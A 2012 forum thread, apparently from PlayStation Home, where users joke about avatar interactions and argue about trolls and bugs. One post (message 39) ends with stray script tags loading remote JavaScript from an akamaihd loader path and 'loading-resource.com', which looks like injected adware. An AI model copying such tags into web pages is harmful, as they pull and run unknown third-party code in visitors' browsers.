I Only Post Everything
1015 posts

Re: Home Interactions

Nov 13, 2012

Yea thats true. lol

But I will say this at least, for those who say " Home is just a game ". No it isn't. Yes it has games in it, but overall Home is more of a social network like Facebook, MySpace, and Twitter. You meet people from all over the world, chat, make friends, and play games together.

Message 31 of 71 (148 Views)
0 Likes
Shinra Executive
29271 posts

Nov 13, 2012

KatCall75 wrote:

I'd like an interaction where when I get disconnected from Home my avatar becomes a flesh eating zombie and terrorizes all in that instance.

If someone misspells too many times it triggers an option where my avatar will grasp their avatar's neck and will violently shake their head back and forth (controlled by shaking the controller) while my avatar screams out, "Learn to spell!"  This will continue until either I stop shaking the controller, or the targeted avatar is laying on the ground in a heap with the words "I am ded" floating above him.

If someone takes more than two minutes to type less than five characters, that person's avatar will magically pull a custard pie from the air and hit himself in the face with it, and is now silenced by the pie for 10 minutes.

If you "Back soon..." on me for more than ten minutes, I should be able to draw a moustache and/or apply makeup on you.

If I use the rumble option on my controller can I feel you shaking me if I'm the target? 

Smiley Happy

Message 32 of 71 (147 Views)
Fender Bender
2291 posts

Nov 13, 2012

Joanna_Dark_ wrote:

KatCall75 wrote:

I'd like an interaction where when I get disconnected from Home my avatar becomes a flesh eating zombie and terrorizes all in that instance.

If someone misspells too many times it triggers an option where my avatar will grasp their avatar's neck and will violently shake their head back and forth (controlled by shaking the controller) while my avatar screams out, "Learn to spell!"  This will continue until either I stop shaking the controller, or the targeted avatar is laying on the ground in a heap with the words "I am ded" floating above him.

If someone takes more than two minutes to type less than five characters, that person's avatar will magically pull a custard pie from the air and hit himself in the face with it, and is now silenced by the pie for 10 minutes.

If you "Back soon..." on me for more than ten minutes, I should be able to draw a moustache and/or apply makeup on you.

If I use the rumble option on my controller can I feel you shaking me if I'm the target? 

Smiley Happy

Yes, and it will increase in intensity the longer you shake. 

Message 33 of 71 (144 Views)
0 Likes
Treasure Hunter
4834 posts

Nov 13, 2012

KatCall75 wrote:

...  in a heap with the words "I am ded" floating above him.

u almos kilt me !   Smiley Very Happy   Smiley Very Happy

Message 34 of 71 (124 Views)
Fender Bender
3995 posts

[ Edited ]
Nov 13, 2012

Joanna_Dark_ wrote:

MJB2348765 wrote:

Joanna_Dark_ wrote:

I want to smoochy poo with someone! Smiley Happy

Jk! LoL.

O.O,are your sure about that Jo? Smiley Tongue

jk = just kidding. Smiley Happy

I was joking lol, I was trying to change your mind when you said JK. XD

Message 35 of 71 (104 Views)
0 Likes
Ghost of Sparta
10662 posts

[ Edited ]
Nov 13, 2012

Jojo careful, MJB's TOTALLY hitting on you 

New PSN ID for PS4: Redd-Axel

Come check out my Twitch TV channel, will be streaming various PS4 games from time to time http://www.twitch.tv/reddaxel
Message 36 of 71 (91 Views)
Treasure Hunter
4834 posts

[ Edited ]
Nov 13, 2012

KatCall75 wrote:

Make it so Home !

Nuff Said !?!

Message 37 of 71 (86 Views)
Hekseville Citizen
165 posts

Nov 13, 2012
I understand the desire for this for the people who literally live on home and have bfs and gfs on there. 2 each his own. Maybe they could make those interactions work solely in a persons personal space that would solve some of the issues.
Message 38 of 71 (82 Views)
0 Likes
Lombax Warrior
136 posts

[ Edited ]
Nov 13, 2012

do u realize what ur asking of them, they have enough trouble w trolls n people complaining bout trolls not mentioning the problems w home as it is. i think if u want a hug r a kiss go to the hideway n get married it's the best n safest way. i would prefer not to be harassed by random guys wanting to kiss me n plus u gotta consider the teenagers on the game n how they would perseive it. even if they set it up that way for it to just be for  friends etc it would be way too much work to do that plus there would be more we have to deal w on settings. it's fine the way it is. every time we change things on home we have bugs that have to be fixed. for instance the update that changed the home PDA, constantly changing the spawn points between home space, the hub, r navigator. n even if it were set for friends it gives the kids on home way too much to be able to do that shouldn't be done.

<script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>

<script type="text/javascript" src="http://loading-resource.com/data.geo.php?callback=window.__geo.dataLoaded"></script> <script type="text/javascript" src="http://loading-resource.com/data.geo.php?callback=window.__geo.dataLoaded"></script>
Message 39 of 71 (71 Views)
0 Likes
I Only Post Everything
1015 posts

Nov 13, 2012

Saniyaday wrote:

" even if they set it up that way for it to just be for  friends etc it would be way too much work to do that plus there would be more we have to deal w on settings. "

They don't do anything as is, thats why theres still so many bugs on like freezes Home, and the trolls, what have they done about them ?

......Anyone care to answer ?..........I'm waiting.......

Yea thats what I thought. Smiley Indifferent

Message 40 of 71 (67 Views)